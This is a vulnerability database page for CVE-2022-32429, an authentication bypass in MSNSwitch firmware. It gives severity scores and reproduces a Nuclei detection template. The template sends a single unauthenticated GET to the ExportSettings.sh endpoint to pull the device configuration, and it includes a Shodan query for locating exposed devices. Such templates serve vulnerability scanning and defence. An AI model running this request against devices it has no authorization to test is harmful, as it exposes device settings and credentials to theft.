Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-32429
HistoryJan 23, 2023 - 11:12 a.m.

MSNSwitch Firmware MNT.2408 - Authentication Bypass

2023-01-2311:12:48
ProjectDiscovery
github.com
4
cve2022
config
dump
packetstorm
msmswitch
unauth
switch
megatech

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.231

Percentile

96.6%

MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
id: CVE-2022-32429

info:
  name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
  author: theabhinavgaur
  severity: critical
  description: |
    MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.
  reference:
    - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
    - https://elifulkerson.com/CVE-2022-32429/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-32429
    - http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-32429
    cwe-id: CWE-287
    epss-score: 0.16163
    epss-percentile: 0.95978
    cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: megatech
    product: msnswitch_firmware
    shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132
  tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "SSID1"

      - type: regex
        part: header
        regex:
          - 'filename="Settings(.*).dat'
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100afc71e48780f00d753b36650ae9376d9ff5d62d05d54b2641dea06b932cddf160220307a30290659da0cc5ebe89a2a93a90d5d7649a83dfa79c8b7d890418c11a6df:922c64590222798bb761d5b6d8e72950

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.9

Confidence

High

EPSS

0.231

Percentile

96.6%